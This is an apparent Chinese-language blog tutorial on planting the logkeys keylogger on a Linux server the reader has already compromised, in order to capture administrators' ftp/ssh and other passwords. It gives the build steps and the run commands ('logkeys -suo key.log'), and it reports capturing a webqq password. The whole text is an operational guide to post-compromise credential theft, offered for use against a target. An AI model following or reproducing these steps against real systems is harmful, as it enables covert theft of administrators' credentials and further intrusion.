拿到Linux服务器的权限后,我们可以在机器上运行一个记录键盘的小工具,来记录管理员平时输入的一些密码。有时候用处很大,比如管理员登录ftp/ssh,我们就可能得到目标密码和很多管理员常用密码。
logkeys:https://code.google.com/p/logkeys/
下载下来源代码。
首先解压:
tar -vxzf logkeys-0.1.1a.tar.gz进入解压后到build目录并运行父目录里的configure,配置编译选项:
cd logkeys-0.1.0/build ../configure
一开始我也在想,为何要进入build目录再运行父目录下的文件(Linux小白感觉多此一举),后来问了一下才知道,不想因为编译弄乱logkeys-0.1.0目录下的东西,所以进到build目录。
然后编译:
make installmake需要root权限。获取一下即可。
编译成功以后我们就可以使用了,先看看帮助:
很简单方便。一般用到三个参数:
-s 开始监听
-u 使用US键位进行替代默认键位。这个很重要,如果不加这个参数到话抓到的东西不对。
-o 输出文件
于是,我们先新建一个文件:
touch key.log然后运行logkes即可:
logkeys -suo key.log
可以试试,登录一下webqq,果然记录下了密码:
需要停止时:
logkeys -kkill掉即可。